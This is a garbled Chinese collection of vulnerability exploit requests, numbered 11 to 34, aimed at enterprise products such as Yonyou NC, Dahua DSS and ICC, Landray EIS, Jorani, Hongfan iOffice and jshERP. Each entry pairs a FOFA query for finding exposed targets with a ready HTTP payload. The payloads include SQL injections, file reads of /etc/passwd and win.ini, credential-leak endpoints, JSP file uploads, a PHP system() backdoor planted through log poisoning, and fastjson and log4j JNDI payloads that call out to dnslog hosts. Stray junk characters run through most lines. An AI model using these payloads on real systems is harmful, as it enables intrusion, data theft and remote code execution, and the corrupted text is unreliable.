11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入8 G0 [- l* F; v4 z
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"" P8 a9 E$ \9 E6 o) Y8 @0 h( n
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
# @9 ~5 d8 ~" U6 z& \0 n. vHost: 127.0.0.1$ Z/ Z+ { P! G7 g& f* t2 l
Pragma: no-cache
" U% ~% A4 m7 hCache-Control: no-cache
, ~- C* A5 e* ^% f2 `Upgrade-Insecure-Requests: 1! `9 H' i$ W" F) @* J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 M- T% g$ D1 V( L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( H% y7 I9 s6 H/ a, e3 XAccept-Encoding: gzip, deflate3 }4 @; V, k3 O* G
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
' H8 \. s& h) s* g2 {' WConnection: close, J) K8 Q$ Y9 _+ }* O( G" @ O
* ~5 H; N- s+ L; [2 {" {0 q
^$ R! W. j: s" B% f5 X
12. Jorani < 1.0.2 远程命令执行
) E: x+ e6 C* b+ Q+ v" ?6 K% n6 wFOFA:title="Jorani"
9 x' q1 e+ S1 \: V. E. l' D' \, f2 P+ B第一步先拿到cookie0 o G+ ^8 b+ `, t, k
GET /session/login HTTP/1.15 a; M5 h' m/ E; _
Host: 192.168.190.30" u; ^# Y, r0 U
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
. m# g( d& Y5 p0 g- I2 TConnection: close
0 u- A7 g6 i$ J2 PAccept-Encoding: gzip
5 U U+ Q9 M6 G
/ f" n7 g& d1 D% J' r6 b, r# d8 M: C; }- w( b# J
响应中csrf_cookie_jorani用于后续请求4 g' S$ n+ Y+ k, g( J Q, {- X
HTTP/1.1 200 OK0 x9 B6 q3 g; c1 o. v. r6 L
Connection: close k0 Q5 j9 c. G2 z; u$ Y
Cache-Control: no-store, no-cache, must-revalidate
5 e3 t) t. L' y! YContent-Type: text/html; charset=UTF-8
2 {; ~: T- w, i% e- x V) m% H, n1 M5 zDate: Tue, 24 Oct 2023 09:34:28 GMT
6 p9 }, z \7 a' B$ I$ Y$ BExpires: Thu, 19 Nov 1981 08:52:00 GMT! m) c7 z) r) {: U. Q2 Q4 f
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
9 a4 P( H9 f* S) ^1 IPragma: no-cache: x4 m4 F0 e; _ F t" Y2 y( v
Server: Apache/2.4.54 (Debian)
' r/ ]# K. R. u1 ]# H1 |, x( ESet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
) ]4 N3 w$ o8 ~" q" X* w5 lSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
9 l% M% { z4 F) s/ y0 U" IVary: Accept-Encoding
$ {& n3 ?" Z: g: V& k) @, f( K* u7 V, x. Z: z
7 n$ g- h5 ^' n$ P
POST请求,执行函数并进行base64编码. {1 f0 m. i1 a( ^2 S
POST /session/login HTTP/1.1. H" {9 @9 c1 L
Host: 192.168.190.301 X, v7 ~1 Q8 {( L% Y2 Z, g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
6 @2 [2 X( W; A" `2 ]3 L9 dConnection: close, X, p& U" d7 `( D3 @
Content-Length: 252
* t- f% K, ?( L5 xContent-Type: application/x-www-form-urlencoded
( _+ ~9 k& N& ICookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r( v7 ?3 [; ^9 K1 C$ G" C3 F7 L
Accept-Encoding: gzip
: \5 s9 _7 a" n& s# k% e" Q3 a" ?$ h/ [. r! j3 m5 Q/ R
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
! S2 m8 ~' U8 q: f3 x& _7 X
; G8 I6 z! [; n/ b; f; {2 ~( A8 ^8 K2 j1 Z5 f6 H: ~8 w
, i0 B" A. I: u0 _/ x向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串$ x, g" D8 E l1 m' t; G
GET /pages/view/log-2023-10-24 HTTP/1.1
2 E I# R' G' q- k8 K1 YHost: 192.168.190.30
! n; B- S% _" P5 V/ n' e- U. iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36, M( P$ _5 a: {( r. d2 t
Connection: close
E8 d5 c) M1 x( \Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
1 b# V8 N3 U9 o/ g8 W/ DK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
. m! v) ]4 P# z5 E9 W- j+ kX-REQUESTED-WITH: XMLHttpRequest! J/ M* H: w4 I- x. y
Accept-Encoding: gzip
2 i# @2 \' @+ R _. P) J/ Z7 {7 w5 J8 z+ w
( h" m% r% O, K) ]+ o! V13. 红帆iOffice ioFileDown任意文件读取
9 s2 y5 W, z; z, M! }FOFA:app="红帆-ioffice"+ F# b* R6 i: S" a v0 N
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1: o" Q. P: R7 n' X3 X6 _# y T0 v
Host: x.x.x.x- `* U5 v1 H' E9 Q0 W6 z. a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36: k* L4 z/ Z1 E1 w* A& Q
Connection: close
/ c9 X* ^) R: D2 B9 EAccept: */*2 b5 G; r( V& [* _
Accept-Encoding: gzip3 h! U+ {; _: \$ _8 F
/ y' S, R5 S+ q% _8 p( ^# M
! M. K2 u8 e: x/ z& z* a9 E7 x" |* U
14. 华夏ERP(jshERP)敏感信息泄露
$ o* z6 E" j/ _, S! tFOFA:body="jshERP-boot"
5 ?% b9 g! B6 I. s$ T/ \: \1 i% j9 S泄露内容包括用户名密码
6 u$ A0 O7 E% a6 B+ jGET /jshERP-boot/user/getAllList;.ico HTTP/1.15 g7 O* A) i3 N7 U
Host: x.x.x.x3 V& D3 s' J8 F9 A. X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
0 [& D, X2 f. KConnection: close
" Z' T+ {+ a) mAccept: */*
5 ]' J& B7 N6 X8 U2 E3 `6 hAccept-Language: en
( E2 U' I1 g; _( U! oAccept-Encoding: gzip# V. b: ^: m# z1 r- t: r
. ]( C. {6 {- _' s5 Z; y+ {1 s* f; U; H8 l
15. 华夏ERP getAllList信息泄露
. h' M8 I5 P' N2 r: `5 @CVE-2024-0490 {; f3 J8 ^# V& I: E* \( M4 h5 r2 _
FOFA:body="jshERP-boot"
. S3 N, z _9 |: r' L e泄露内容包括用户名密码! O) c1 }. @$ v" x# E
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
8 H2 u2 o+ J# jHost: 192.168.40.130:100
2 I% }4 R8 \8 W; t* _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36; m. T v% {) a5 t
Connection: close
! [0 n* ~% M5 T# ]# V- u" ?* lAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.85 j/ x: S. V) z" V, r( H! r$ A. z. Z
Accept-Language: en
$ h8 Z6 N% g7 v( _ fsec-ch-ua-platform: Windows+ j" F3 t j1 x' |! i
Accept-Encoding: gzip
% z' Y" |# } f" |2 s0 o' S3 J: y& [& d7 `$ y7 v! X5 e3 S
! I9 H+ r K) o- E S2 A" X9 r16. 红帆HFOffice医微云SQL注入
0 v7 c/ Y( c1 l# ?4 rFOFA:title="HFOffice"! w( s6 E" Y; V" `& X# X$ b" _
poc中调用函数计算1234的md5值
- B# n$ ]7 ]9 N# r% vGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
9 Z, y! ]2 K( L/ `! SHost: x.x.x.x/ M: H" w) r' N8 U6 ~ d8 L
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
& g* a+ U ~0 Z- n3 ~Connection: close7 M: n- j* }! n
Accept: */*
9 q8 h( K5 w% M2 bAccept-Language: en( Q- C3 T: ^% b+ Q5 S% N
Accept-Encoding: gzip+ B- s1 k8 T$ q
n6 F& O! C( ]6 h9 C! K, s& h; R# g& }, J4 }1 g5 u
17. 大华 DSS itcBulletin SQL 注入
; A6 h0 j2 h. P, @/ C! w5 W* dFOFA:app="dahua-DSS"9 M5 P( t; [) k# G
POST /portal/services/itcBulletin?wsdl HTTP/1.1$ c( [8 }, b1 O4 r5 G1 r
Host: x.x.x.x& W7 Q5 {! x2 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, A1 M9 ~0 P- JConnection: close
! ?: R, E" {: t. ?Content-Length: 3452 m5 w& R7 f$ T; N P& @
Accept-Encoding: gzip8 _, f$ T& o5 I
; _! B6 h% w1 I, D<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>2 Q7 u; P, o1 c& M' D
<s11:Body>" Q' Y% f3 R+ H3 b; \
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
9 A9 l( q8 ]( S' [9 G$ g: H% o <netMarkings>7 M) [. f* e, v7 ~( o0 |3 M. r
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
1 V4 V) q3 c* d8 N* ~ </netMarkings>
) m S; [ t+ ]2 Q* h9 \( l$ @ </ns1:deleteBulletin>
2 Z2 P# ?, b: X- i) x Y+ z7 D </s11:Body>
# N3 m0 a- C! v$ o</s11:Envelope>
& o% P! Z7 }) y* k7 @) X- {. f; Y m2 I& r9 T
+ D$ @* J! c6 s7 n& _18. 大华 DSS 数字监控系统 user_edit.action 信息泄露( Z$ a/ o' j8 {) `
FOFA:app="dahua-DSS"
* m( w9 ], C q6 V7 oGET /admin/cascade_/user_edit.action?id=1 HTTP/1.17 L- x: h; ?1 g |" e3 S
Host: your-ip
$ K. o: Z9 ^5 K6 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ u4 J0 P# D/ o- J
Accept-Encoding: gzip, deflate$ E0 d3 Y' @% ~! q
Accept: */*: c4 z6 k: D3 G# m- J6 O
Connection: keep-alive
) r/ }/ k+ E, I7 e
9 S0 `$ Z1 I" x2 x) ~3 ?0 E9 a9 v8 U' m7 x
0 R/ l5 A( @' j1 A. q
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入) @1 e: M3 r& z$ i
FOFA:app="dahua-DSS"
& s& c- k8 i7 d+ \GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
" p! d4 n$ L( K* B- S. |8 yHost:
9 F W( Q3 ]$ D6 E* {; d( I h$ EUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ u; D2 T6 O0 ]7 aAccept-Encoding: gzip, deflate) T' C6 c0 F4 D3 S7 I6 g
Accept: */*
9 w9 G+ m C8 N8 {! a/ DConnection: keep-alive
5 x' E% V2 j2 J/ P( `7 I0 m+ T" g" d4 `% f/ v
& M# ], m$ p: M$ R" ~3 o
20. 大华ICC智能物联综合管理平台任意文件读取
- I2 _ e- D' U! f7 {% [+ u; I- QFOFA:body="*客户端会小于800*"
5 J/ Q/ a( @$ ?/ LGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
- k: W; ?1 q$ O3 e; KHost: x.x.x.x. Y8 U) P3 v! l1 t
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" @" G& [- B" ^. Z+ r' Y
Connection: close
# K( K5 Q8 _2 g6 Z( ]' l' LAccept: */*4 h9 u! ~6 y9 ~0 _. n
Accept-Language: en
/ p' |* Q8 z8 B# [Accept-Encoding: gzip! o3 b: ~; u% M9 E3 {
$ Y& Q2 Y- R- `, k W/ H% C' V4 j3 v
21. 大华ICC智能物联综合管理平台random远程代码执行" o" E( r; B' b( l! Y t
FOFA:icon_hash="-1935899595"( O/ H1 e7 ?% u+ y9 {% s% `
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
6 { e, e+ _& W6 { f- L% M3 iHost: x.x.x.x
7 p$ b# ? n: L m$ e6 }/ J( ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# n* t: P7 C1 D+ ~' @
Content-Length: 161
9 Z( u8 L% s. l4 ~- eAccept-Encoding: gzip
, |, D9 `/ u+ z- Y9 Z3 _Connection: close
0 B' w3 k" q B' j( w: K, F6 IContent-Type: application/json;charset=utf-8" W/ y) ^* q: g& t7 d" u8 a
- Q' F6 j( {2 m7 @{5 F2 n7 _- L) _5 T: |8 \
"a":{
* W; \4 }4 o9 h7 T1 U "@type":"com.alibaba.fastjson.JSONObject",: U, q: M8 E, E" M
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}# V; I& u- F3 E, E, ^6 W
}"" Z1 W# j3 U5 Z9 z5 {5 ?; G1 S
}
2 t2 @7 c8 z8 D5 U b- K: R# ~' n( A( c) U- Q+ D2 z; p5 V- Z
" p/ P) K8 I2 J& A! B
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
. L1 j$ I6 \2 b8 ^FOFA:icon_hash="-1935899595". u+ U" F" |- V3 k* A" M1 D1 _& g
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1$ }+ V$ \' R; G5 ?6 Z' J
Host: your-ip3 d3 z# J5 `5 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 K0 n* F( o) T. ]2 ?, Y4 p# p
Content-Type: application/json;charset=utf-88 ^+ v2 F1 F U0 L% ^4 _- y4 w: C
: s$ T$ Z( R- x b
{
, H! \/ \, F' q& ^' t* b( t"loginName":"${jndi:ldap://dnslog}"
: W' a7 l# D& f" _4 L- d}, }4 M/ |/ o$ m8 r$ r8 L
9 |( \. ~% \) ]4 x- R |' V
+ Y! l& k5 Y: w# i- I8 q' ]5 P3 ^. ^; B8 J/ g- S
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行* O g* }# G& c
FOFA:icon_hash="-1935899595"
# |: \7 P: {3 x0 X: I3 F" l& H3 W$ OPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
% c6 o+ R: ^0 n2 b! a* p8 r0 RHost: your-ip
" Y, v% q1 i0 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( r& B) z0 ]2 f# F/ L" o8 k$ t* YContent-Type: application/json;charset=utf-8
# t W; j p5 y: `$ B+ s8 DAccept-Encoding: gzip; T2 p7 ~9 q2 M' j% p
Connection: close+ Z: j$ j6 x6 h
5 c6 n! i, l) v9 f' |3 \
{! y; R0 Z: r0 H' k- N- G
"a":{+ }9 v% i# u: J% i& j
"@type":"com.alibaba.fastjson.JSONObject",
8 }4 B2 s1 I e- D {"@type":"java.net.URL","val":"http://DNSLOG"}
- T. v1 W( L) K. [# r }""
0 E0 \" X- B$ \/ c6 ^+ }) s}
, _( z5 T p6 ^% [* e& I% i, ]: v. E$ l( s
; i+ c2 S# P! Y: y3 S% @+ f) {
24. 用友NC 6.5 accept.jsp任意文件上传8 w( @4 s6 J7 W$ n- R/ s
FOFA:icon_hash="1085941792"; M6 X8 ?. i/ d
POST /aim/equipmap/accept.jsp HTTP/1.1% g; R3 L: @: J2 p3 v) g4 v+ f) H
Host: x.x.x.x
5 Q; w: M9 G" C! k+ G. C% UUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36( D! U* L4 L; X. e: n. I5 s8 j; M7 [
Connection: close
* L, U. Q5 q% X: ~& v/ N1 M; sContent-Length: 449( o, W" T9 ]+ g* \! T
Accept: */*9 z' b) ]& {- U/ N' R
Accept-Encoding: gzip
& N' n0 r' a0 M# ?, BContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc5 T+ K+ g8 `7 Z& D& D9 z
8 @% [ A3 `( _, L
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc9 P6 Z& K( z" z1 e* h3 p. s
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
! T- A1 \& c4 H/ G) \' n' |! HContent-Type: text/plain- F" E8 ~# s* H
& k6 |! ~+ }' }1 W0 J<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>8 }4 U" U! _9 ?& ~% V
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
0 b& L& g2 b% j$ h! ^8 U+ ]Content-Disposition: form-data; name="fname"4 {9 f" Y9 z% ?0 f& B& j/ b
* `5 ?1 W, Q' c9 v( B\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp& j- }7 A, S) |# D; O; O
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
, m1 C% t: I" r6 z( M
4 C; P K+ o' O ~
3 y: E- n6 |& j# n$ E) D+ ]8 j0 r- y25. 用友NC registerServlet JNDI 远程代码执行/ W6 @" [3 @# Y+ J/ s2 |/ s
FOFA:app="用友-UFIDA-NC"$ `% e2 M% }/ |% G
POST /portal/registerServlet HTTP/1.1: I' r' t) Y8 q, V6 w% j2 r; G
Host: your-ip) F8 _& O" D8 F/ a5 N0 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.09 L9 n! H. c' X8 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
4 s& Z! B: w/ kAccept-Encoding: gzip, deflate
0 |' p/ m& L% _; P; ^* |9 JAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
$ B7 k5 X% I' nContent-Type: application/x-www-form-urlencoded
8 {' c8 G8 C' p+ r" e& [4 S
, o: L! t3 v0 btype=1&dsname=ldap://dnslog
7 D# |/ W+ a4 R3 {& x" s6 v7 q, o8 @9 y8 k1 g; F
; U H! T; d% B0 F, D3 H! \
4 Q' ]' v( `5 u! T5 I) j26. 用友NC linkVoucher SQL注入0 ]# H3 F2 \' c" @8 k$ M9 X
FOFA:app="用友-UFIDA-NC", ?5 u; ]' C' t3 G
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.15 s" H( X Q# z% g9 c9 t D
Host: your-ip1 z7 ?* }/ D/ R4 p, @9 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' m0 b: F3 K) d* R% U J; @, G& fContent-Type: application/x-www-form-urlencoded
) S2 `, O* H4 D$ cAccept-Encoding: gzip, deflate0 T3 F! a* T. x& Y2 ^4 a
Accept: */*
8 o0 i: p/ R0 sConnection: keep-alive& ?/ v+ W2 z) d3 ~8 o
* e+ J) |( K$ j/ r- {' g6 y: @! T
$ f. r& W6 ^( R* a5 u, c% I0 m5 S( C
27. 用友 NC showcontent SQL注入) X- g Y% c% q9 N1 \! o% ^0 D8 {' a: y
FOFA:icon_hash="1085941792"
$ X5 w! V3 `* O# O* oGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
4 j% r5 R3 z5 RHost: your-ip
6 a' _5 w8 V" X8 A4 |. p h+ y" EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 `6 I9 ~0 j9 }5 gAccept-Encoding: identity
. \6 Z$ G( i: B' o; w. J' ?* j9 nConnection: close8 A" P9 V: p a$ R" o( P* V
Content-Type: text/xml; charset=utf-8
, T% c J( X, M X0 Y0 [
+ {/ Y6 u$ `" J; a' i
) [9 s4 v7 ~! _ h* t9 U28. 用友NC grouptemplet 任意文件上传4 E& h% Z. U `
FOFA:icon_hash="1085941792"
' \8 U) {9 J zPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
) M) @5 R" ?+ l. O3 E. o, w0 @9 \Host: x.x.x.x
4 L+ \$ S* s; w9 |( QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36& X0 q! S5 _5 ]* d
Connection: close# B' n6 c, Y) Y5 [% d
Content-Length: 268
" L: z) {# ~) B/ ?( D) GContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk6 o6 @7 v* _/ P5 n+ |; U1 H+ e/ r6 u2 t1 {
Accept-Encoding: gzip t0 m7 Z' E6 \2 r' c
5 J/ C# S: G' l. H( F------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
: g, O; K# K) o4 a4 o' V) rContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"* V% Z# K( G/ V o5 O* }% t3 {
Content-Type: application/octet-stream
3 Q) T5 }3 v. t" \% { |" K3 s3 a
2 u0 n# ]$ z) x. k8 ?<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
5 h$ x% M5 Y o! `- z------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
8 k1 C7 [: N! b: o- u k
( \ a% |. k# l
( _ @3 f1 i+ E: R% Y. F5 F2 P! m4 l/uapim/static/pages/nc/head.jsp
" z' N3 v O9 }" I: }2 t" r' c2 y0 ^7 ^4 w; I% }
29. 用友NC down/bill SQL注入8 ^6 o& x# y* E% Q
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"9 `3 U, a# C: M3 c
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
- p- q% C" C. g& X/ k& NHost: your-ip( A! j4 Q5 L% P2 F6 o. Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 o9 ]6 B( W% B" L* l) |) O7 d1 [
Content-Type: application/x-www-form-urlencoded
1 e& C5 e/ |2 H2 P+ X9 YAccept-Encoding: gzip, deflate1 z, C% o# }" c `7 [
Accept: */*
2 }# a% p5 r7 u! R1 O7 W9 o5 LConnection: keep-alive. c- o1 k+ Z, s# z
2 e( I m( F" Q. G, t/ u" Q3 V
, \2 o# I3 s* d30. 用友NC importPml SQL注入
( a( X0 J! r4 B4 L: }( i& nFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
- W" i& V5 ~# }8 GPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
+ d L! s" k/ i( z5 dHost: your-ip; H1 d. R w* n3 g# p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V8 _5 I' d/ a& q- I+ h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36: o! K0 t/ h% ~" } C0 ^
Connection: close
6 o7 q$ h- J4 u [! b2 } m) H' i0 ?3 ~; U g) h3 O4 z. l
------WebKitFormBoundaryH970hbttBhoCyj9V
/ m" g' w9 r# A% EContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
6 k& I* l7 k9 y1 [Content-Type: image/jpeg" L4 q: N: w( A; o2 r
------WebKitFormBoundaryH970hbttBhoCyj9V--7 r" {$ W3 [8 v+ N
: f* b+ d ?( _8 X/ |, \2 }5 X4 L: C1 @' l- w/ d
31. 用友NC runStateServlet SQL注入
7 b) x2 s6 a- l3 rversion<=6.5
9 r w4 g5 x* s( Q" pFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
# z$ _5 W* f2 L3 W! V7 L' q7 o5 j }GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
& z, `8 T2 h/ o0 c, p$ OHost: host
, `, A! r3 s* o& S q3 ?+ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36# K$ M2 M6 {/ n7 f
Content-Type: application/x-www-form-urlencoded$ U8 c; B' _3 l- S8 H4 W. A
% |! C0 j: }$ O3 ~* E
6 x( A* X9 ]- G' Z; j
32. 用友NC complainbilldetail SQL注入
_6 L4 V6 \1 \) yversion= NC633、NC65' a; q- v6 `3 n
FOFA:app="用友-UFIDA-NC"
* \5 [1 o$ m' x% P2 P4 vGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
! _0 `& c' J% y3 w+ a' yHost: your-ip6 ^6 a0 w4 A @1 k$ Z$ I1 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; i2 W4 ?1 D* l/ VContent-Type: application/x-www-form-urlencoded
: h. E7 k+ ]9 P# M: zAccept-Encoding: gzip, deflate2 v1 `, m# ]1 l" ]& [: U' D
Accept: */*( Z- m$ e( x2 t( w2 U: F
Connection: keep-alive
. T# b# T" C2 j$ v( R; z- e9 `7 y: ~- N" e) \0 r
3 z8 Y) c, k }4 p5 h33. 用友NC downTax/download SQL注入
2 D/ v1 t( K9 p {, `8 bversion:NC6.5FOFA:app="用友-UFIDA-NC"
+ B% G& K. O; }7 nGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1" v3 ^" ~8 Y7 t6 N! r/ Q
Host: your-ip% u3 E. S" C: K: U4 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 t3 p r& M' M( m& QContent-Type: application/x-www-form-urlencoded0 b; t: v( S! R, q
Accept-Encoding: gzip, deflate
. r8 n9 W; R; D8 sAccept: */*
3 G( p9 {1 h u! o1 E# B. MConnection: keep-alive
# {% b- [4 \8 q' r; z) N% s
2 L$ v% c: d' d( o0 F3 b; R( F3 a4 {5 n- b
34. 用友NC warningDetailInfo接口SQL注入
/ H4 Z+ M! h2 z6 ? r/ NFOFA:app="用友-UFIDA-NC"
6 d0 Y7 K' _# Q0 zGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
3 U7 P* ?% f& l4 {2 f5 vHost: your-ip
+ U# c5 G8 D) g$ pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; X3 M, Y5 t+ O. c9 DContent-Type: application/x-www-form-urlencoded
" a. F* F$ o) S Z4 ^. AAccept-Encoding: gzip, deflate
5 M; X/ e% q" u% R8 H' kAccept: */*
" H, l; c: g* V: A1 S! z) XConnection: keep-alive( _5 P e3 ]: z' C: ~. ~( L
' P' ?. y, h% z( N" {" _
